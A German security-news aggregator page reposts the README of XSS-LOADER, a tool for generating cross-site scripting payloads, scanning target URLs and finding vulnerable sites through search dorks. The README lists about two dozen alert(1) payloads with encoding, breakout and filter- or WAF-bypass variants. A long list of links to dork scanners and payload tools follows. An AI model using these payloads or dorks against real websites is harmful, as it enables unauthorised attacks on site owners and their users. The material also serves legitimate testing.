Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


All in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER
Written by Hulya Karabag
Instagram: Hulya Karabag

Screenshots







How to use

Read Me
  • This tool creates payload for use in xss injection
  • Select default payload tags from parameter or write your payload
  • It makes xss inj. with Xss Scanner parameter
  • It finds vulnerable sites url with Xss Dork Finder parameter

Installation

Installation with requirements.txt
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Usage
python3 payloader.py

Features

*Basic Payload
Sets default parameter to :<script>alert(1)</script>

*Div Payload
Sets default parameter to :<div onpointerover='alert(1)'>MOVE HERE</div

*Img Payload
Sets default parameter to :<img src=x onerror=alert('1');>

*Body Payload
Sets default parameter to :<body ontouchstart=alert(1)>

*Svg Payload
Sets default parameter to :<svg onload=alert('1')>

*Enter Your Payload
Encodes payload writed by user

*Payload Generator Parameter
Encodes payload on selected tag


* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* | 2. UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. URL ENCODE -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. HTML ENTITY ENCODE-----> &lt;script&gt;alert(1)&lt;/script&gt;
* | 5. SPLIT PAYLOAD -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. HEX ENCODE -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 ENCODE -----> Encode payload to utf-16 format.
* | 8. UTF-32 ENCODE-----> Encode payload to utf-32 format.
* | 9. DELETE TAG -----> ";alert('XSS');//
* | 10. UNICODE ENCODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII ENCODE -----> ยผscriptยพalert(1)ยผ/scriptยพ
* | 1 2. BASE64 ENCODE -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 ENCODE -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. PARENTHESIS BYPASS -----> <script>alert`1`</script>
* | 15. UTF-8 ENCODE -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* | 17. SCRIPT BREAKOUT-----> </script><script>alert(1)</script>
* | 18. FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* | 19. INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* | 20. MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* | 22. SPACE BYPASS-----> <img^Lsrc=x^ Lonerror=alert('1');>
* | 23. DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* | 25. CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* | 26. POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* | 27. ALERT PAYLOADS-----> Show Alert Payload List
* | 28. ALL CREATE PAYLOAD-----> Show Create All Payloads
* | 29. GO BACK MAIN MENU
* | 30. EXIT

*Xss Scanner
Initially you'll need to enter url of target Please enter the url like this example==>e.g target -----> http://target.com/index.php?name= Selected for scanning payload list
  • BASIC PAYLOAD LIST ==> Payload list consisting of script tag
  • DIV PAYLOAD LIST ==> Payload list consisting of div tag
  • IMG PAYLOAD LIST ==> Payload list consisting of img tag
  • BODY PAYLOAD LIST ==> Payload list consisting of body tag
  • SVG PAYLOAD LIST ==> Payload list consisting of svg tag
  • MIXED PAYLOAD LIST ==> Payload list consisting of all tag
  • ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)
Results will be added in "vulnpayload.txt" after scanning.

*Xss Dork Finder
First enter the dork for searching: e.g---->inurl:"search.php?q=" Results will be saved in "dork.txt" after scanning.

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

Support and Donations
Contact us with email [email protected]
Copyright 2020


...



๐Ÿ“Œ TSP Dork generator v16.1|HQ Dork generator - Now with custom dork types


๐Ÿ“ˆ 89.55 Punkte

๐Ÿ“Œ TSP Dork generator v16.1|HQ Dork generator - Now with custom dork types


๐Ÿ“ˆ 89.55 Punkte

๐Ÿ“Œ Go-Dork - The Fastest Dork Scanner Written In Go


๐Ÿ“ˆ 54.64 Punkte

๐Ÿ“Œ dork-cli โ€“ Command-line Google Dork Tool


๐Ÿ“ˆ 44.58 Punkte

๐Ÿ“Œ APSoft-Web-Scanner-v2 - Powerful Dork Searcher And Vulnerability Scanner For Windows Platform


๐Ÿ“ˆ 42.41 Punkte

๐Ÿ“Œ TSP Dork generator v.14.0 Gold Edition New 2019


๐Ÿ“ˆ 33.63 Punkte

๐Ÿ“Œ Dork Generator


๐Ÿ“ˆ 33.63 Punkte

๐Ÿ“Œ Dork Generator


๐Ÿ“ˆ 33.63 Punkte

๐Ÿ“Œ TSP Dork generator v.15.0


๐Ÿ“ˆ 33.63 Punkte

๐Ÿ“Œ Dork Generator v1.0 By Kidux


๐Ÿ“ˆ 33.63 Punkte

๐Ÿ“Œ EZ DORK SCANNER


๐Ÿ“ˆ 32.35 Punkte

๐Ÿ“Œ Simple SQLi Dork Scanner 2019


๐Ÿ“ˆ 32.35 Punkte

๐Ÿ“Œ Arcaneyon Website Dork Scanner v3.0 2019


๐Ÿ“ˆ 32.35 Punkte

๐Ÿ“Œ SQLi-DB-SQL Injection Dork Scanner v1.0


๐Ÿ“ˆ 32.35 Punkte

๐Ÿ“Œ SQLi Dork Scanner Public Version by hax0rZ


๐Ÿ“ˆ 32.35 Punkte

๐Ÿ“Œ dorkScanner - A Typical Search Engine Dork Scanner Scrapes Search Engines With Dorks That You Provide In Order To Find Vulnerable URLs


๐Ÿ“ˆ 32.35 Punkte

๐Ÿ“Œ dorkX - Pipe Different Tools With Google Dork Scanner


๐Ÿ“ˆ 32.35 Punkte

๐Ÿ“Œ [[ PAYLOAD ]] - The Situation Response Payload - Hak5 2317


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ [[ PAYLOAD ]] - Best Payload Practices - Hak5 2318


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ [[ PAYLOAD ]] - OS Detection Payload - Hak5 2319


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ [[ PAYLOAD ]] - Best Payload Practices - Hak5 2318 (RE-UPLOAD)


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ Learn Polymorphic Powershell Payload Techniques! [PAYLOAD]


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ What is Request Payload / Payload Body 2019


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ PAYLOAD: ICMP Data Exfiltration - USB Rubber Ducky/Exfiltration [PAYLOAD MINUTE]


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ PAYLOAD: DuckyLogger 2.0 - Keylogger for USB Rubber Ducky [PAYLOAD MINUTE]


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ Aladdin - Payload Generation Technique That Allows The Deseriallization Of A .NET Payload And Execution In Memory


๐Ÿ“ˆ 30.72 Punkte

๐Ÿ“Œ WiFi Finder, a Popular Hotspot Finder App, Exposed 2 Million Wi-Fi Network Passwords


๐Ÿ“ˆ 28.32 Punkte

๐Ÿ“Œ WiFi Finder, a Popular Hotspot Finder App, Exposed 2 Million Wi-Fi Network Passwords


๐Ÿ“ˆ 28.32 Punkte

๐Ÿ“Œ Okadminfinder3 - Admin Panel Finder / Admin Login Page Finder


๐Ÿ“ˆ 28.32 Punkte

๐Ÿ“Œ Finder Windows 1.5.2 - Access macOS Finder windows easily.


๐Ÿ“ˆ 28.32 Punkte

๐Ÿ“Œ OKadminFinder - Admin Panel Finder / Admin Login Page Finder


๐Ÿ“ˆ 28.32 Punkte

๐Ÿ“Œ Duplicate File Finder Remover 7.0.5 - Professional duplicate finder and cleaner.


๐Ÿ“ˆ 28.32 Punkte

๐Ÿ“Œ Path Finder 2151 - Powerful, award-winning Finder alternative.


๐Ÿ“ˆ 28.32 Punkte

๐Ÿ“Œ RapidPayload Framework - Metasploit Payload Generator - Kali Linux


๐Ÿ“ˆ 26.7 Punkte











matomo